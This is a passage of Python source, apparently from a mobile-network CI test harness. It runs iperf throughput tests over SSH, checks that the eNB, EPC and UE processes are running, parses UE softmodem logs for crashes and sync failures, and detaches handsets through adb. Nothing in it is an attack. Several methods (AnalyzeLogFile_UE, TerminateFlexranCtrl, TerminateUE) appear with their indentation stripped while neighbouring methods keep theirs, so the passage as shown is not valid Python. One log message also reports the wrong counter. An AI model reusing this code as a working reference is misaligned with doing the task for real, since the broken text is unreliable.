			iClientUser = self.UEUserName
			iClientPasswd = self.UEPassword
		else:
			iServerIPAddr = self.UEIPAddress
			iServerUser = self.UEUserName
			iServerPasswd = self.UEPassword
			iClientIPAddr = RAN.eNBIPAddress
			iClientUser = RAN.eNBUserName
			iClientPasswd = RAN.eNBPassword
		if self.iperf_options != 'sink':
			# Starting the iperf server
			SSH.open(iServerIPAddr, iServerUser, iServerPasswd)
			# args SHALL be "-c client -u any"
			# -c 10.0.1.2 -u -b 1M -t 30 -i 1 -fm -B 10.0.1.1
			# -B 10.0.1.1 -u -s -i 1 -fm
			server_options = re.sub('-u.*$', '-u -s -i 1 -fm', str(self.iperf_args))
			server_options = server_options.replace('-c','-B')
			SSH.command('rm -f /tmp/tmp_iperf_server_' + self.testCase_id + '.log', '\$', 5)
			SSH.command('echo $USER; nohup iperf ' + server_options + ' > /tmp/tmp_iperf_server_' + self.testCase_id + '.log 2>&1 &', iServerUser, 5)
			time.sleep(0.5)
			SSH.close()
		# Starting the iperf client
		modified_options = self.Iperf_ComputeModifiedBW(0, 1)
		modified_options = modified_options.replace('-R','')
		iperf_time = self.Iperf_ComputeTime()
		SSH.open(iClientIPAddr, iClientUser, iClientPasswd)
		SSH.command('rm -f /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', 5)
		iperf_status = SSH.command('stdbuf -o0 iperf ' + modified_options + ' 2>&1 | stdbuf -o0 tee /tmp/tmp_iperf_' + self.testCase_id + '.log', '\$', int(iperf_time)*5.0)
		status_queue = SimpleQueue()
		lock = Lock()
		if iperf_status < 0:
			message = 'iperf on OAI UE crashed due to TIMEOUT !'
			logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
			clientStatus = -2
		else:
			if self.iperf_options == 'sink':
				# sink test: nothing to analyze, enqueue a fixed "no check" result
				clientStatus = 0
				status_queue.put(0)
				status_queue.put('OAI-UE')
				status_queue.put('10.0.1.2')
				status_queue.put('Sink Test : no check')
			else:
				clientStatus = self.Iperf_analyzeV2Output(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
		SSH.close()
		# Stopping the iperf server
		if self.iperf_options != 'sink':
			SSH.open(iServerIPAddr, iServerUser, iServerPasswd)
			SSH.command('killall --signal SIGKILL iperf', '\$', 5)
			time.sleep(0.5)
			SSH.close()
		# client report missing (-1): fall back to analyzing the server log
		if (clientStatus == -1):
			if (os.path.isfile('iperf_server_' + self.testCase_id + '.log')):
				os.remove('iperf_server_' + self.testCase_id + '.log')
			SSH.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
			self.Iperf_analyzeV2Server(lock, '10.0.1.2', 'OAI-UE', status_queue, modified_options)
		# copying on the EPC server for logCollection
		if (clientStatus == -1):
			copyin_res = SSH.copyin(iServerIPAddr, iServerUser, iServerPasswd, '/tmp/tmp_iperf_server_' + self.testCase_id + '.log', 'iperf_server_' + self.testCase_id + '_OAI-UE.log')
			if (copyin_res == 0):
				SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_server_' + self.testCase_id + '_OAI-UE.log', EPC.SourceCodePath + '/scripts')
		copyin_res = SSH.copyin(iClientIPAddr, iClientUser, iClientPasswd, '/tmp/tmp_iperf_' + self.testCase_id + '.log', 'iperf_' + self.testCase_id + '_OAI-UE.log')
		if (copyin_res == 0):
			SSH.copyout(EPC.IPAddress, EPC.UserName, EPC.Password, 'iperf_' + self.testCase_id + '_OAI-UE.log', EPC.SourceCodePath + '/scripts')
		iperf_noperf = False
		if status_queue.empty():
			iperf_status = False
		else:
			iperf_status = True
		# drain the queue: entries come in groups of 4 (status, device, ip, message)
		html_queue = SimpleQueue()
		while (not status_queue.empty()):
			count = status_queue.get()
			if (count < 0):
				iperf_status = False
			if (count > 0):
				iperf_noperf = True
			device_id = status_queue.get()
			ip_addr = status_queue.get()
			message = status_queue.get()
			html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
			html_queue.put(html_cell)
		if (iperf_noperf and iperf_status):
			HTML.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
		elif (iperf_status):
			HTML.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
		else:
			HTML.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
			self.AutoTerminateUEandeNB()
	def Iperf(self):
		"""Run iperf throughput tests on every attached UE in parallel.

		Dispatches to IperfNoS1() when the eNB was started in noS1 mode.
		Otherwise spawns one Iperf_common worker Process per UE IP address,
		collects per-UE results from status_queue (groups of 4 entries:
		status, device id, ip, message) and writes the aggregate verdict to
		the HTML report; on 'KO' the whole UE/eNB setup is auto-terminated.
		"""
		result = re.search('noS1', str(RAN.Initialize_eNB_args))
		if result is not None:
			self.IperfNoS1()
			return
		if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '' or self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		check_eNB = True
		# only check the OAI UE process when the single attached device is the OAI UE
		if (len(self.UEDevices) == 1) and (self.UEDevices[0] == 'OAI-UE'):
			check_OAI_UE = True
		else:
			check_OAI_UE = False
		pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
		if (pStatus < 0):
			HTML.CreateHtmlTestRow(self.iperf_args, 'KO', pStatus)
			self.AutoTerminateUEandeNB()
			return
		ueIpStatus = self.GetAllUEIPAddresses()
		if (ueIpStatus < 0):
			logging.debug('going here')
			HTML.CreateHtmlTestRow(self.iperf_args, 'KO', CONST.UE_IP_ADDRESS_ISSUE)
			self.AutoTerminateUEandeNB()
			return
		# iperf version detection is currently disabled; 2.0.10 is assumed
		self.dummyIperfVersion = '2.0.10'
		#cmd = 'iperf --version'
		#logging.debug(cmd + '\n')
		#iperfStdout = subprocess.check_output(cmd, shell=True, universal_newlines=True)
		#result = re.search('iperf version 2.0.5', str(iperfStdout.strip()))
		#if result is not None:
		#	dummyIperfVersion = '2.0.5'
		#result = re.search('iperf version 2.0.10', str(iperfStdout.strip()))
		#if result is not None:
		#	dummyIperfVersion = '2.0.10'
		multi_jobs = []
		i = 0
		ue_num = len(self.UEIPAddresses)
		lock = Lock()
		status_queue = SimpleQueue()
		# one worker process per UE
		for UE_IPAddress in self.UEIPAddresses:
			device_id = self.UEDevices[i]
			p = Process(target = self.Iperf_common, args = (lock,UE_IPAddress,device_id,i,ue_num,status_queue,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
			i = i + 1
		for job in multi_jobs:
			job.join()
		if (status_queue.empty()):
			# no worker reported anything at all
			HTML.CreateHtmlTestRow(self.iperf_args, 'KO', CONST.ALL_PROCESSES_OK)
			self.AutoTerminateUEandeNB()
		else:
			iperf_status = True
			iperf_noperf = False
			html_queue = SimpleQueue()
			while (not status_queue.empty()):
				count = status_queue.get()
				if (count < 0):
					iperf_status = False
				if (count > 0):
					iperf_noperf = True
				device_id = status_queue.get()
				ip_addr = status_queue.get()
				message = status_queue.get()
				html_cell = '<pre style="background-color:white">UE (' + device_id + ')\nIP Address : ' + ip_addr + '\n' + message + '</pre>'
				html_queue.put(html_cell)
			if (iperf_noperf and iperf_status):
				HTML.CreateHtmlTestRowQueue(self.iperf_args, 'PERF NOT MET', len(self.UEDevices), html_queue)
			elif (iperf_status):
				HTML.CreateHtmlTestRowQueue(self.iperf_args, 'OK', len(self.UEDevices), html_queue)
			else:
				HTML.CreateHtmlTestRowQueue(self.iperf_args, 'KO', len(self.UEDevices), html_queue)
				self.AutoTerminateUEandeNB()
	def CheckProcessExist(self, check_eNB, check_OAI_UE):
		"""Verify in parallel that the EPC, eNB and/or OAI UE processes are alive.

		Spawns one worker Process per component; workers push their status
		codes onto a shared queue.  Returns 0 on success, -15 when no worker
		reported, or the most recent negative status otherwise.  When the eNB
		process died, its log file is copied in and analyzed for a more
		specific status code.
		"""
		multi_jobs = []
		status_queue = SimpleQueue()
		# in noS1 config, no need to check status from EPC
		# in gNB also currently no need to check
		result = re.search('noS1|band78', str(RAN.Initialize_eNB_args))
		if result is None:
			p = Process(target = EPC.CheckHSSProcess, args = (status_queue,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
			p = Process(target = EPC.CheckMMEProcess, args = (status_queue,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
			p = Process(target = EPC.CheckSPGWProcess, args = (status_queue,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
		else:
			# nothing at all to check in this configuration
			if (check_eNB == False) and (check_OAI_UE == False):
				return 0
		if check_eNB:
			p = Process(target = RAN.CheckeNBProcess, args = (status_queue,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
		if check_OAI_UE:
			p = Process(target = self.CheckOAIUEProcess, args = (status_queue,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
		for job in multi_jobs:
			job.join()
		if (status_queue.empty()):
			return -15
		else:
			result = 0
			# keep the last negative status seen (if any)
			while (not status_queue.empty()):
				status = status_queue.get()
				if (status < 0):
					result = status
			if result == CONST.ENB_PROCESS_FAILED:
				# try to refine the failure reason from the eNB log file
				fileCheck = re.search('enb_', str(RAN.eNBLogFiles[0]))
				if fileCheck is not None:
					SSH.copyin(RAN.eNBIPAddress, RAN.eNBUserName, RAN.eNBPassword, RAN.eNBSourceCodePath + '/cmake_targets/' + RAN.eNBLogFiles[0], '.')
					logStatus = RAN.AnalyzeLogFile_eNB(RAN.eNBLogFiles[0])
					if logStatus < 0:
						result = logStatus
					RAN.eNBLogFiles[0]=''
				if RAN.flexranCtrlInstalled and RAN.flexranCtrlStarted:
					self.TerminateFlexranCtrl()
			return result
	def CheckOAIUEProcessExist(self, initialize_OAI_UE_flag):
		"""Check that the OAI UE process is alive (unless it is being initialized).

		Returns 0 on success, -15 when no status was reported, or the last
		negative status code.  When the UE process died, the UE log file is
		copied in and analyzed for a more specific status code.
		"""
		multi_jobs = []
		status_queue = SimpleQueue()
		# skip the check while the UE is still being initialized
		if initialize_OAI_UE_flag == False:
			p = Process(target = self.CheckOAIUEProcess, args = (status_queue,))
			p.daemon = True
			p.start()
			multi_jobs.append(p)
		for job in multi_jobs:
			job.join()
		if (status_queue.empty()):
			return -15
		else:
			result = 0
			while (not status_queue.empty()):
				status = status_queue.get()
				if (status < 0):
					result = status
			if result == CONST.OAI_UE_PROCESS_FAILED:
				# try to refine the failure reason from the UE log file
				fileCheck = re.search('ue_', str(self.UELogFile))
				if fileCheck is not None:
					SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
					logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
					if logStatus < 0:
						result = logStatus
			return result
	def CheckOAIUEProcess(self, status_queue):
		"""Check over SSH that the OAI UE softmodem process is running.

		Pushes CONST.OAI_UE_PROCESS_OK or CONST.OAI_UE_PROCESS_FAILED onto
		status_queue.  Runs inside a worker Process: on any exception the
		parent process is signalled with SIGUSR1 instead of raising.
		"""
		try:
			SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
			SSH.command('stdbuf -o0 ps -aux | grep --color=never ' + self.air_interface + ' | grep -v grep', '\$', 5)
			result = re.search(self.air_interface, SSH.getBefore())
			if result is None:
				logging.debug('\u001B[1;37;41m OAI UE Process Not Found! \u001B[0m')
				status_queue.put(CONST.OAI_UE_PROCESS_FAILED)
			else:
				status_queue.put(CONST.OAI_UE_PROCESS_OK)
			SSH.close()
		except:
			# worker process: notify the parent rather than raising
			os.kill(os.getppid(),signal.SIGUSR1)
def AnalyzeLogFile_UE(self, UElogFile):
if (not os.path.isfile('./' + UElogFile)):
return -1
ue_log_file = open('./' + UElogFile, 'r')
exitSignalReceived = False
foundAssertion = False
msgAssertion = ''
msgLine = 0
foundSegFault = False
foundRealTimeIssue = False
uciStatMsgCount = 0
pdcpDataReqFailedCount = 0
badDciCount = 0
f1aRetransmissionCount = 0
fatalErrorCount = 0
macBsrTimerExpiredCount = 0
rrcConnectionRecfgComplete = 0
no_cell_sync_found = False
mib_found = False
frequency_found = False
plmn_found = False
nrUEFlag = False
nrDecodeMib = 0
nrFoundDCI = 0
nrCRCOK = 0
mbms_messages = 0
HTML.htmlUEFailureMsg=''
global_status = CONST.ALL_PROCESSES_OK
for line in ue_log_file.readlines():
result = re.search('nr_synchro_time', str(line))
if result is not None:
nrUEFlag = True
if nrUEFlag:
result = re.search('decode mib', str(line))
if result is not None:
nrDecodeMib += 1
result = re.search('found 1 DCIs', str(line))
if result is not None:
nrFoundDCI += 1
result = re.search('CRC OK', str(line))
if result is not None:
nrCRCOK += 1
result = re.search('Exiting OAI softmodem', str(line))
if result is not None:
exitSignalReceived = True
result = re.search('System error|[Ss]egmentation [Ff]ault|======= Backtrace: =========|======= Memory map: ========', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Cc]ore [dD]ump', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('./lte-uesoftmodem', str(line))
if result is not None and not exitSignalReceived:
foundSegFault = True
result = re.search('[Aa]ssertion', str(line))
if result is not None and not exitSignalReceived:
foundAssertion = True
result = re.search('LLL', str(line))
if result is not None and not exitSignalReceived:
foundRealTimeIssue = True
if foundAssertion and (msgLine < 3):
msgLine += 1
msgAssertion += str(line)
result = re.search('uci->stat', str(line))
if result is not None and not exitSignalReceived:
uciStatMsgCount += 1
result = re.search('PDCP data request failed', str(line))
if result is not None and not exitSignalReceived:
pdcpDataReqFailedCount += 1
result = re.search('bad DCI 1', str(line))
if result is not None and not exitSignalReceived:
badDciCount += 1
result = re.search('Format1A Retransmission but TBS are different', str(line))
if result is not None and not exitSignalReceived:
f1aRetransmissionCount += 1
result = re.search('FATAL ERROR', str(line))
if result is not None and not exitSignalReceived:
fatalErrorCount += 1
result = re.search('MAC BSR Triggered ReTxBSR Timer expiry', str(line))
if result is not None and not exitSignalReceived:
macBsrTimerExpiredCount += 1
result = re.search('Generating RRCConnectionReconfigurationComplete', str(line))
if result is not None:
rrcConnectionRecfgComplete += 1
# No cell synchronization found, abandoning
result = re.search('No cell synchronization found, abandoning', str(line))
if result is not None:
no_cell_sync_found = True
if RAN.eNBmbmsEnables[0]:
result = re.search('TRIED TO PUSH MBMS DATA', str(line))
if result is not None:
mbms_messages += 1
result = re.search("MIB Information => ([a-zA-Z]{1,10}), ([a-zA-Z]{1,10}), NidCell (?P<nidcell>\d{1,3}), N_RB_DL (?P<n_rb_dl>\d{1,3}), PHICH DURATION (?P<phich_duration>\d), PHICH RESOURCE (?P<phich_resource>.{1,4}), TX_ANT (?P<tx_ant>\d)", str(line))
if result is not None and (not mib_found):
try:
mibMsg = "MIB Information: " + result.group(1) + ', ' + result.group(2)
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " nidcell = " + result.group('nidcell')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " n_rb_dl = " + result.group('n_rb_dl')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_duration = " + result.group('phich_duration')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " phich_resource = " + result.group('phich_resource')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mibMsg = " tx_ant = " + result.group('tx_ant')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
mib_found = True
except Exception as e:
logging.error('\033[91m' + "MIB marker was not found" + '\033[0m')
result = re.search("Measured Carrier Frequency (?P<measured_carrier_frequency>\d{1,15}) Hz", str(line))
if result is not None and (not frequency_found):
try:
mibMsg = "Measured Carrier Frequency = " + result.group('measured_carrier_frequency') + ' Hz'
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
frequency_found = True
except Exception as e:
logging.error('\033[91m' + "Measured Carrier Frequency not found" + '\033[0m')
result = re.search("PLMN MCC (?P<mcc>\d{1,3}), MNC (?P<mnc>\d{1,3}), TAC", str(line))
if result is not None and (not plmn_found):
try:
mibMsg = 'PLMN MCC = ' + result.group('mcc') + ' MNC = ' + result.group('mnc')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
plmn_found = True
except Exception as e:
logging.error('\033[91m' + "PLMN not found" + '\033[0m')
result = re.search("Found (?P<operator>[\w,\s]{1,15}) \(name from internal table\)", str(line))
if result is not None:
try:
mibMsg = "The operator is: " + result.group('operator')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + '\n'
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "Operator name not found" + '\033[0m')
result = re.search("SIB5 InterFreqCarrierFreq element (.{1,4})/(.{1,4})", str(line))
if result is not None:
try:
mibMsg = "SIB5 InterFreqCarrierFreq element " + result.group(1) + '/' + result.group(2)
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + mibMsg + ' -> '
logging.debug('\033[94m' + mibMsg + '\033[0m')
except Exception as e:
logging.error('\033[91m' + "SIB5 InterFreqCarrierFreq element not found" + '\033[0m')
result = re.search("DL Carrier Frequency/ARFCN : \-*(?P<carrier_frequency>\d{1,15}/\d{1,4})", str(line))
if result is not None:
try:
freq = result.group('carrier_frequency')
new_freq = re.sub('/[0-9]+','',freq)
float_freq = float(new_freq) / 1000000
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + 'DL Freq: ' + ('%.1f' % float_freq) + ' MHz'
logging.debug('\033[94m' + " DL Carrier Frequency is: " + str(freq) + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " DL Carrier Frequency not found" + '\033[0m')
result = re.search("AllowedMeasBandwidth : (?P<allowed_bandwidth>\d{1,7})", str(line))
if result is not None:
try:
prb = result.group('allowed_bandwidth')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + ' -- PRB: ' + prb + '\n'
logging.debug('\033[94m' + " AllowedMeasBandwidth: " + prb + '\033[0m')
except Exception as e:
logging.error('\033[91m' + " AllowedMeasBandwidth not found" + '\033[0m')
ue_log_file.close()
if rrcConnectionRecfgComplete > 0:
statMsg = 'UE connected to eNB (' + str(rrcConnectionRecfgComplete) + ' RRCConnectionReconfigurationComplete message(s) generated)'
logging.debug('\033[94m' + statMsg + '\033[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if nrUEFlag:
if nrDecodeMib > 0:
statMsg = 'UE showed ' + str(nrDecodeMib) + ' MIB decode message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if nrFoundDCI > 0:
statMsg = 'UE showed ' + str(nrFoundDCI) + ' DCI found message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if nrCRCOK > 0:
statMsg = 'UE showed ' + str(nrCRCOK) + ' PDSCH decoding message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if not frequency_found:
statMsg = 'NR-UE could NOT synch!'
logging.error('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if uciStatMsgCount > 0:
statMsg = 'UE showed ' + str(uciStatMsgCount) + ' "uci->stat" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if pdcpDataReqFailedCount > 0:
statMsg = 'UE showed ' + str(pdcpDataReqFailedCount) + ' "PDCP data request failed" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if badDciCount > 0:
statMsg = 'UE showed ' + str(badDciCount) + ' "bad DCI 1(A)" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if f1aRetransmissionCount > 0:
statMsg = 'UE showed ' + str(f1aRetransmissionCount) + ' "Format1A Retransmission but TBS are different" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if fatalErrorCount > 0:
statMsg = 'UE showed ' + str(fatalErrorCount) + ' "FATAL ERROR:" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if macBsrTimerExpiredCount > 0:
statMsg = 'UE showed ' + str(fatalErrorCount) + ' "MAC BSR Triggered ReTxBSR Timer expiry" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if RAN.eNBmbmsEnables[0]:
if mbms_messages > 0:
statMsg = 'UE showed ' + str(mbms_messages) + ' "TRIED TO PUSH MBMS DATA" message(s)'
logging.debug('\u001B[1;30;43m ' + statMsg + ' \u001B[0m')
else:
statMsg = 'UE did NOT SHOW "TRIED TO PUSH MBMS DATA" message(s)'
logging.debug('\u001B[1;30;41m ' + statMsg + ' \u001B[0m')
global_status = CONST.OAI_UE_PROCESS_NO_MBMS_MSGS
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + statMsg + '\n'
if foundSegFault:
logging.debug('\u001B[1;37;41m UE ended with a Segmentation Fault! \u001B[0m')
if not nrUEFlag:
global_status = CONST.OAI_UE_PROCESS_SEG_FAULT
else:
if not frequency_found:
global_status = CONST.OAI_UE_PROCESS_SEG_FAULT
if foundAssertion:
logging.debug('\u001B[1;30;43m UE showed an assertion! \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + 'UE showed an assertion!\n'
if not nrUEFlag:
if not mib_found or not frequency_found:
global_status = CONST.OAI_UE_PROCESS_ASSERTION
else:
if not frequency_found:
global_status = CONST.OAI_UE_PROCESS_ASSERTION
if foundRealTimeIssue:
logging.debug('\u001B[1;37;41m UE faced real time issues! \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + 'UE faced real time issues!\n'
if nrUEFlag:
if not frequency_found:
global_status = CONST.OAI_UE_PROCESS_COULD_NOT_SYNC
else:
if no_cell_sync_found and not mib_found:
logging.debug('\u001B[1;37;41m UE could not synchronize ! \u001B[0m')
HTML.htmlUEFailureMsg=HTML.htmlUEFailureMsg + 'UE could not synchronize!\n'
global_status = CONST.OAI_UE_PROCESS_COULD_NOT_SYNC
return global_status
def TerminateFlexranCtrl(self):
if RAN.flexranCtrlInstalled == False or RAN.flexranCtrlStarted == False:
return
if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
SSH.command('echo ' + EPC.Password + ' | sudo -S daemon --name=flexran_rtc_daemon --stop', '\$', 5)
time.sleep(1)
SSH.command('echo ' + EPC.Password + ' | sudo -S killall --signal SIGKILL rt_controller', '\$', 5)
time.sleep(1)
SSH.close()
RAN.flexranCtrlStarted=False
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
	def TerminateUE_common(self, device_id, idx):
		"""Detach one COTS UE (airplane mode on) and kill any leftover iperf.

		Runs inside a worker Process: on any exception the parent is
		signalled with SIGUSR1 instead of raising.  idx selects the remote
		ADB relay server when self.ADBCentralized is False.
		"""
		try:
			SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
			# back in airplane mode on (ie radio off)
			if self.ADBCentralized:
				#RH quick add on to integrate cots control defined by yaml
				#if device Id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
				#otherwise we use the legacy procedure
				if COTS_UE.Check_Exists(device_id):
					#switch device to Airplane mode ON (ie Radio OFF)
					COTS_UE.Set_Airplane(device_id, 'ON')
				elif device_id == '84B7N16418004022':
					# this specific handset needs root to run the off script
					SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
				else:
					SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
			else:
				SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
			logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
			# kill any iperf still running on the device
			if self.ADBCentralized:
				SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "ps | grep --color=never iperf | grep -v grep"', '\$', 5)
			else:
				SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "ps | grep --color=never iperf | grep -v grep"\'', '\$', 60)
			result = re.search('shell +(?P<pid>\d+)', SSH.getBefore())
			if result is not None:
				pid_iperf = result.group('pid')
				if self.ADBCentralized:
					SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"', '\$', 5)
				else:
					SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "kill -KILL ' + pid_iperf + '"\'', '\$', 60)
			SSH.close()
		except:
			# worker process: notify the parent rather than raising
			os.kill(os.getppid(),signal.SIGUSR1)
def TerminateUE(self):
terminate_ue_flag = False
self.GetAllUEDevices(terminate_ue_flag)
multi_jobs = []
i = 0
for device_id in self.UEDevices:
p = Process(target= self.TerminateUE_common, args = (device_id,i,))
p.daemon = True
p.start()
multi_jobs.append(p)
i += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
	def TerminateOAIUE(self):
		"""Stop the OAI UE softmodem (SIGINT, then SIGKILL) and analyze its log.

		After killing the process, copies the UE log file locally, runs
		AnalyzeLogFile_UE and writes the resulting verdict to the HTML
		report; auto-terminates the setup on unrecoverable failures.
		"""
		SSH.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
		SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
		SSH.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
		result = re.search('-uesoftmodem', SSH.getBefore())
		if result is not None:
			# graceful stop first, escalate to SIGKILL if still alive
			SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGINT -r .*-uesoftmodem || true', '\$', 5)
			time.sleep(10)
			SSH.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
			result = re.search('-uesoftmodem', SSH.getBefore())
			if result is not None:
				SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGKILL -r .*-uesoftmodem || true', '\$', 5)
				time.sleep(5)
		SSH.command('rm -f my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
		SSH.close()
		result = re.search('ue_', str(self.UELogFile))
		if result is not None:
			copyin_res = SSH.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
			if (copyin_res == -1):
				logging.debug('\u001B[1;37;41m Could not copy UE logfile to analyze it! \u001B[0m')
				HTML.htmlUEFailureMsg='Could not copy UE logfile to analyze it!'
				HTML.CreateHtmlTestRow('N/A', 'KO', CONST.OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE, 'UE')
				self.UELogFile = ''
				return
			logging.debug('\u001B[1m Analyzing UE logfile \u001B[0m')
			logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
			# '--no-L2-connect' means the UE was only sniffing, not attaching
			result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
			if result is not None:
				ueAction = 'Sniffing'
			else:
				ueAction = 'Connection'
			if (logStatus < 0):
				logging.debug('\u001B[1m' + ueAction + ' Failed \u001B[0m')
				HTML.htmlUEFailureMsg='<b>' + ueAction + ' Failed</b>\n' + HTML.htmlUEFailureMsg
				HTML.CreateHtmlTestRow('N/A', 'KO', logStatus, 'UE')
				if self.air_interface == 'lte-uesoftmodem':
					# In case of sniffing on commercial eNBs we have random results
					# Not an error then
					if (logStatus != CONST.OAI_UE_PROCESS_COULD_NOT_SYNC) or (ueAction != 'Sniffing'):
						self.Initialize_OAI_UE_args = ''
						self.AutoTerminateUEandeNB()
				else:
					if (logStatus == CONST.OAI_UE_PROCESS_COULD_NOT_SYNC):
						self.Initialize_OAI_UE_args = ''
						self.AutoTerminateUEandeNB()
			else:
				logging.debug('\u001B[1m' + ueAction + ' Completed \u001B[0m')
